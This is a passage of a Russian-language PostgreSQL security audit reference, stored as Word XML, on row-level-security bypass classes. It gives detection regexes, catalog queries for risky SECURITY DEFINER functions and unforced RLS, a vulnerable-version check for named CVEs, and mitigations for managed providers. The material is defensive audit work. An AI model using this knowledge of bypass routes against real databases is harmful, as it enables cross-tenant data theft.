        <w:t xml:space="preserve">    re.compile(r"CREATE\s+OPERATOR\b[^;]*\b(RESTRICT|JOIN)\s*=", re.IGNORECASE),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3.17.5: SECURITY DEFINER без FORCE ROW LEVEL SECURITY на читаемой таблице</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # (требует cross-check с pg_class.relforcerowsecurity)</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RLS_BYPASS_PROC_AUDITS = [</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # SD-функции от superuser, читающие RLS-protected tables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n.nspname, p.proname FROM pg_proc p</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    JOIN pg_roles r ON r.oid = p.proowner</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    WHERE p.prosecdef = true</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">      AND (r.rolsuper = true OR r.rolbypassrls = true)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Tables с RLS но БЕЗ FORCE RLS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n.nspname, c.relname FROM pg_class c</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    JOIN pg_namespace n ON n.oid = c.relnamespace</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    WHERE c.relrowsecurity = true AND c.relforcerowsecurity = false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PG-version-check для 3.17.1/3.17.3 (CVE-2024-10976/10978)</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SELECT version() ~ '(PostgreSQL 17\\.0|16\\.[0-4]|15\\.[0-8]|14\\.[0-9]|14\\.1[0-3]|13\\.[0-9]|13\\.1[0-6]|12\\.[0-9]|12\\.1[0-9]|12\\.20)'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        AS is_vulnerable_to_2024_10976_10978</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RLS_BYPASS_SIGNATURES = [</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # runtime: behavioral / log</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    "auto_explain.*Filter:.*\\(tenant_id = \\d+\\)",  # cached RLS filter from wrong role</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # application-side cross-row consistency violations - not regex but behavioral</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RLS_BYPASS_RISK = 8  # high — direct data exfiltration, compliance-critical</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Эти rules ловят основные SQL patterns + требуют cross-check с metadata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pg_roles</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) для полной audit-полноты. PG-version-detection — критичный component для CVE-detection.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Перекрёстные ссылки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3.13.1 SET ROLE / CVE-2024-10978</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — тот же CVE как 3.17.3. Cross-ref обязателен. Граница: 3.13.1 — privilege escalation; 3.17.3 — data exfiltration.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3.13.6 SECURITY DEFINER + SET search_path</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — parallel class privilege escalation в SD-функциях. Связан с 3.17.5 (RLS bypass через SD).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3.16.5 SECURITY DEFINER + dynamic SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — third class уязвимостей в SD-функциях (identifier injection). Все три (3.13.6, 3.16.5, 3.17.5) — components одного класса «SECURITY DEFINER hygiene».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3.8.6 pg_stats_ext leak (CVE-2024-4317)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — related с 3.17.4 (CVE-2025-8713). Граница: 3.8.6 — view permissions bypass; 3.17.4 — planning-phase custom operator bypass. Параллельные подкатегории statistics-leak class.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3.6.4 lo_import / file r/w</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — RLS bypass через 3.17 даёт data access, но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">не file/RCE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> automatically. Для RCE требуется отдельный privilege escalation (3.13) или COPY TO PROGRAM (3.7.1) под superuser.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 RCE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — отдельная категория. RLS обход → data leak, но not RCE; для RCE нужен independent vector.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4.3 Хронология 2023</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — CVE-2023-39418 (3.17.2) в context 2023 batch.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 Хронология 2024</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — CVE-2024-10976 / CVE-2024-10978 (3.17.1 / 3.17.3) в context 14.11.2024 batch.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 Хронология 2025</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — CVE-2025-8713 (3.17.4) в context 14.08.2025 batch.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4.6 Версионные таблицы минор-релизов</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — sweep dates fix для всех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Принцип наименьших привилегий</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ограничение CREATE OPERATOR/FUNCTION, NOT-superuser owner для SD-функций.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5.5 Конфиги PostgreSQL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auto_explain.log_min_duration</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для diagnostics 3.17.1/3.17.3 plan-cache issues.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Managed-провайдеры (RDS, Cloud SQL, Supabase)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">RLS — standard feature, доступная во всех managed providers. Specific provider behavior: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AWS RDS / Aurora PostgreSQL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3.17.1 / 3.17.3 (CVE 2024-10976/10978): RDS обычно обновляется на patched minor через 1–2 недели после upstream. Production кластеры на legacy minor versions — vulnerable.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3.17.2 (MERGE CVE-2023-39418): почти все RDS PG15 запущены на 15.4+ (релиз 15.0 был в pre-RDS-availability окне).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3.17.4 (CVE-2025-8713): RDS Performance Insights может flag unusual operator queries.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3.17.5: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обычно owner таблиц → SD-функции от него триггерят RLS bypass без </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">FORCE RLS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. RDS не запрещает создавать такие функции.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Google Cloud SQL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Аналогичная patch policy.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 equivalent для 3.17.5.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CloudSQL Insights / Query Insights для runtime monitoring.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Supabase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Critical context</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Supabase архитектура </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">массово использует SECURITY DEFINER функции для RLS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. PostgREST RPC patterns часто базируются на SD-functions с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">auth.uid()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> checks внутри.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Если разработчик пропускает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 uses SD-функцию без </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">auth.uid()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> filter — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">direct 3.17.5 уязвимость</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Supabase docs recommend </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">FORCE RLS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auth.uid()</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auth.jwt()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> filters внутри функций. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Audit Supabase deployment на adherence — critical.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Azure Database for PostgreSQL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То же поведение; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">azure_pg_admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> имеет owner-like privileges для RLS bypass.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Audit logs (через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extension) рекомендуется enable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Key provider-difference для 3.17</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: на managed providers </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">upgrade на patched minor PG-version часто не controlled by tenant</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — provider applies patches на их schedule. Это означает, что для CVE-anchored bypass (3.17.1, 3.17.3, 3.17.4) tenant зависит от provider's patch SLA. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Always check current PG version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version()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) для confirmation что fix applied.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Для defence-in-depth на managed providers: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`FORCE ROW LEVEL SECURITY`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> на все critical tables — закрывает 3.17.5 и mitigates impact future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`pgaudit` extension</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — детальный log для всех SD-function calls и MERGE-statements.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Application-side cross-row consistency checks</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — detection cross-tenant leaks даже до server-side fix.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`SET LOCAL` вместо `SET` для session-variables</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — mitigates reset-path 3.17.3.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">4.1 Обзор раздела 4</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Раздел 4 — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">хронологический индекс CVE PostgreSQL 2022–2026</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Большинство уязвимостей уже разобраны полными карточками в категориях 3.X.N — там есть «Суть», «Уязвимый код», «Payload», «Что произойдёт», «Версии», «Источники» по </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">conventions.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Цель раздела 4 — собрать те же 28 R-якорей в одно место в порядке релизов, чтобы команда могла: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быстро увидеть, какие CVE открыты для конкретного minor (4.6 версионная таблица);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понять цепочки эксплуатации, где один CVE усиливает другой (4.7);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учесть специфику managed-провайдеров (4.9 RDS / Cloud SQL / Supabase / Azure).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Граница с 3.X.N</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3.X.N — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">карточки по классам атак</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
